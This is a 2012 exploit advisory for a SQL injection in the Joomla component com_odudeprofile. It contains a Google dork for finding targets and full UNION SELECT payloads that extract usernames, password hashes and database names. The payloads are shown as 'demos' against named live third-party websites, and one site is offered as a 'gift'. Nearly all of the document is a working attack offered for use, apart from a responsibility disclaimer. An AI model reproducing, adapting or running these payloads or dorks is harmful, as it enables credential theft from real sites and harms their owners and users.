______________________________________________________________________________________
Exploit Title: Joomla com_odudeprofile V2.x Exploit
Google Dork: inurl:index.php?option=com_odudeprofile
Date: [24-07-2012]
Author: Daniel Barragan "D4NB4R"
Twitter: @D4NB4R
site: http://poisonsecurity.wordpress.com/
Vendor: http://www.odude.com
Version: 2.7 & 2.8
Download: http://www.odude.com/home/profile.html
License: Non-Commercial
Tested on: [Linux(arch)-Windows(7ultimate)]
______________________________________________________________________________________
Test:
http://127.0.0.1/index.php?option=com_odudeprofile&view=search&profession=idtrue%27
Sql:
http://127.0.0.1/index.php?option=com_odudeprofile&view=search&profession=(SQL)
demo1:
http://genteagro.com/index.php?option=com_odudeprofile&view=search&profession=999999.9%27%20union%20all%20select%200x31303235343830303536%2C%28select%20concat%28username,0x3D,password%29%20from%20jos_users%29%20%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--%20D4NB4R%20demo2:
Demo2
http://www.eveproducciones.com.mx/perfil/index.php?option=com_odudeprofile&view=search&profession=999999.9%27%20union%20all%20select%200x31303235343830303536%2C%28select%20concat%28jos_users.username,0x3D,jos_users.password%29%20from%20%60eveprodu_joomesp%60.jos_users%20Order%20by%20username%20limit%200,1%29%20%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--%20d4nb4r
demo3:
http://www.urbansky.co.za/index.php?option=com_odudeprofile&view=search&profession=999999.9.9%27%20union%20all%20select%200x31303235343830303536%2Cconcat%28unhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--%20D4NB4R
Gift:
http://www.eveproducciones.com.mx/perfil/
Im not responsible for which is given
No me hago responsable del uso que se le de
_______________________________________________________________________________________
Daniel Barragan "D4NB4R"
